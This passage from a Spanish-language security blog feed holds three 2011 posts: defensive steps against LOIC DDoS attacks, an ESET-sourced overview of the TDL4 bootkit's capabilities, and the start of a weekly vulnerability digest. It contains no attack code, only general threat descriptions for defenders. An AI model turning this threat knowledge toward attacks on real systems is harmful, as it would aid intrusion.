10pt;"&gt;Secuelas:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Documentar&amp;nbsp;detalles&amp;nbsp;del incidente,&amp;nbsp;analizar las lecciones aprendidas,&amp;nbsp;y ajustar los planes&amp;nbsp;y las defensas.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l1 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;6.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Recuperación:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt; Objetivo:&amp;nbsp;Volver&amp;nbsp;el estado funcional&amp;nbsp;anterior.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Este trabajo no es tarea de un día para otro, sino que requiere de una buena planificación estratégica y en un futuro espero poder escribir del workflow a seguir.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;A nivel técnico existen variadas opciones, y muchos sabores de fabricantes, hoy solo plantearé las medidas cuando estamos en contra del tiempo.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;1.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Aislar el entorno objetivo, esto quiere decir sacar el web server de la DMZ y pasarlo a otro enlace para no afectar a toda la infraestructura y a nuestros enlaces principales… de gran ayuda es nuestro ISP para rutear todo ese tráfico a otro enlace y no tener que cambiar registros DNS, NAT, ETC.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;2.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Poner un Web Application Firewall para mitigar ataques que puedan provocar defaced, ya que en el canal de IRC a cada rato solicitan la modificación del sitio (Recomiendo IMPERVA)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;3.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Poner un IPS que detecte las peticiones de LOIC (TippingPoint lo hace), para así mitigar las conexiones concurrentes, y establecer umbrales de SYN Flood, recordemos que LOIC ataca por TCP, UDP y HTTP.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;4.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Poner un firewall con buena capacidad de conexiones concurrentes… cuando realicé una prueba con el LOIC, contra un web server sin protección, se detectaron 250 conexiones concurrentes, así que es cosa de dividir las conexiones concurrentes que soporta tu firewall, por las 250 que ya nombre, así tendrán una métrica de cuantos atacantes podrán soportar&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;5.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Poner un Sniffer para capturar el ataque y en un futuro estudiarlo, les recomiendo un buen almacenamiento si el ataque dura varias horas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo2; text-indent: -18.0pt;"&gt;&lt;span style="font-size: 10pt;"&gt;6.&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Poner el sitio web en modo texto, así las consultas al portal serán más pequeñas y no tendrán que cargar imágenes, flash y todas esas cosas pesadas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Por otra parte tenemos a un actor de Cloud, que últimamente se ha hecho famoso por su gran capacidad de procesamiento y comerse varios millones de zombis LOIC, estoy hablando del &lt;a href="http://www.akamai.com/html/solutions/security/ddos_defense.html"&gt;AKAMAI&lt;/a&gt;, un servicio de Anti DDoS, que si bien es cierto, es caro… para organizaciones que realizaron la metodología que presento, sabrán cual es el riesgo y las pérdidas que les puede traer este tipo de ataques.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Finalmente, les dejo algunos screen de TippingPoint, aunque no me gusta mucho hablar de marcas, pero funciona:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://2.bp.blogspot.com/-5kewfB-rBCo/ThcvBHaCFrI/AAAAAAAAAJ0/ReZgwK5mWSw/s1600/firma.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="55" src="http://2.bp.blogspot.com/-5kewfB-rBCo/ThcvBHaCFrI/AAAAAAAAAJ0/ReZgwK5mWSw/s400/firma.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Vacunas Anti LOIC &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="font-family: Wingdings; font-size: 10pt;"&gt;J&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://2.bp.blogspot.com/-aj_P4-lHzxo/Thcu_3Cc91I/AAAAAAAAAJo/KvQb2kjHvkY/s1600/ataque.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="136" src="http://2.bp.blogspot.com/-aj_P4-lHzxo/Thcu_3Cc91I/AAAAAAAAAJo/KvQb2kjHvkY/s400/ataque.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-size: 10pt;"&gt;Detectando y deteniendo el ataque:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Espero poder postear pronto y muchas gracias por la gran cantidad de visitas en el Blog.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-5408878293672624087?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/mineduccl-tango-down.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-eCKRQ0jwFS0/ThcvBUSTQiI/AAAAAAAAAJ4/43FEEd_Unkw/s72-c/flyer.jpg" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-7334404324494892991</guid><pubDate>Sat, 02 Jul 2011 16:24:00 +0000</pubDate><atom:updated>2011-07-08T15:24:59.194-04:00</atom:updated><title>La evolución del BotNet</title><description>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Calibri, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;Comentarios:&amp;nbsp;&lt;/b&gt;pramirezh[at]gmail_dot_com&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Calibri, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;Como sabemos, cada cierto tiempo (cada vez menor) el &lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif; font-weight: normal;"&gt;nivel de sofisticación del malware aumenta&lt;/span&gt;&lt;/strong&gt;. Nuevas técnicas y métodos de evasión y de propagación son desarrolladas por los creadores de malware día a día. Luego de que el famoso gusano &lt;a href="http://es.wikipedia.org/wiki/Stuxnet"&gt;Stuxnet&lt;/a&gt; fuera descubierto a mediados del año pasado y su complejo funcionamiento e intenciones fueron revelados, ningún otro malware mostró un nivel que se acercara a sus capacidades técnicas.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;En esta oportunidad hablaremos del &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;rootkit&lt;/span&gt;&lt;/em&gt; nombrado por sus creadores &lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;TDL4, también conocido como TDSS &lt;/span&gt;&lt;/strong&gt;y detectado como &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;&lt;a href="http://www.eset.com/us/threat-center/encyclopedia/threats/win32olmarikxg"&gt;&lt;span style="font-style: normal;"&gt;Win32/Olmarik&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/em&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Los autores de este rootkit implementaron uno de los más avanzados y sofisticados mecanismos para saltear varias medidas preventivas y mecanismos de seguridad del sistema operativo. En la actualidad es la amenaza más compleja conocida.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Consta de varias versiones las cuales fueron variando en complejidad desde su aparición hace aproximadamente 2 años. TDL3, TDL2 y TDL1 son las versiones anteriores de esta amenaza. Aunque todas las versiones comparten características similares, TDL4 podría considerarse como una nueva clase de malware por sus &lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;capacidades mejoradas&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt; que detallaremos a continuación.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;TDL4 es la primera versión diseñada para afectar equipos con sistema operativo de 64 bits como Windows Vista y Windows 7.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span id="more-12596"&gt;&lt;/span&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;TDL4 tiene la habilidad de cargar su driver en sistemas que cuentan con protecciones que requieren firmas digitales de drivers (Versiones de 64 bits de Microsoft Vista y 7) y realiza hooks en el kernel de windows, aunque este tenga las protecciones contra el parcheo de kernel activadas.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Una de las mejoras sustanciales de TDL4 es la &lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;complejidad de su algoritmo de encriptación del protocolo utilizado para comunicación entre las máquinas infectadas y los centros de comando y control &lt;/span&gt;&lt;/strong&gt;de la botnet. Los nombres de dominio a los cuales se conecta y un parámetro, ambos localizados en el archivo cfg.ini, son utilizados como llave de encriptación.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/-x7_HG-PMVyc/Tg9FzJvBvHI/AAAAAAAAAIc/KQPss63syLg/s1600/TDL4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://2.bp.blogspot.com/-x7_HG-PMVyc/Tg9FzJvBvHI/AAAAAAAAAIc/KQPss63syLg/s400/TDL4.png" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="mobile-photo"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Una de sus características principales es la de&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt; modificar el MBR (Master Boot Record)&lt;/span&gt;&lt;/strong&gt; lo que le permite ejecutar código con fines maliciosos antes que el sistema operativo, para permitirle entre otras cosas, tener acceso a un sistema de archivos oculto creado por el malware. Por esta razón también es llamado &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;Bootkit&lt;/span&gt;&lt;/em&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;En cuanto a números, esta amenaza&lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt; posee más de 4 millones de equipos infectados a nivel mundial&lt;/span&gt;&lt;/strong&gt;, lo que le permite por su número de computadoras infectadas y su complejidad ser una de las botnets más sofisticadas y poderosas en la actualidad.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;TDL4 ha desplazado a Zeus y otras botnets, en el ranking de amenazas más complejas y peligrosas que existen hoy en día. Esto se debe no solo al número de equipos infectados sino a una de sus tantas características. TDL4 tiene la habilidad de detectar la presencia de otras botnets y removerlas quedando así como la única botnet con control del equipo. Otra característica muy interesante a nivel técnico de este malware es la &lt;strong&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;habilidad de formar parte de una red descentralizada del tipo Peer to Peer (P2P)&lt;/span&gt;&lt;/strong&gt;, logrando así permanecer operativo aunque se den de baja alguno de sus servidores.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Fuente: ESET&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-7334404324494892991?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/la-evolucion-del-botnet.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-x7_HG-PMVyc/Tg9FzJvBvHI/AAAAAAAAAIc/KQPss63syLg/s72-c/TDL4.png" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-362080759413000368</guid><pubDate>Fri, 01 Jul 2011 13:48:00 +0000</pubDate><atom:updated>2011-07-01T09:48:34.360-04:00</atom:updated><title>Resumen de Vulnerabilidades - Semana 27</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;_____________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; @RISK: The Consensus Security Vulnerability Alert&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Week 27 2011&lt;br /&gt;
_____________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
Summary of Updates and Vulnerabilities in this Consensus&lt;br /&gt;
&lt;br /&gt;
Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Number of Updates and Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-------------------------&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; -------------------------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Third Party Windows Apps&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7 (#3)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Mac Os&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 (#1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;BSD&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Novell&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Cross Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 10 (#2)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;Web Application - SQL Injection&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;Web Application&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;Network Device&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;****************************************************************************&lt;br /&gt;
&lt;br /&gt;
Part I -- Critical Vulnerabilities from TippingPoint (&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.tippingpoint.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.tippingpoint.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;) Widely Deployed Software&lt;br /&gt;
(1) HIGH: Mac OS/X Multiple Security Vulnerabilities&lt;br /&gt;
(2) MEDIUM: Google Chrome Multiple Vulnerabilities&lt;br /&gt;
(3) MEDIUM: Citrix EdgeSight Launcher Service Heap buffer Overflow&lt;br /&gt;
&lt;br /&gt;
*************************************************************************&lt;br /&gt;
&lt;br /&gt;
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;br /&gt;
(&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; -- Third Party Windows Apps&lt;/b&gt;&lt;br /&gt;
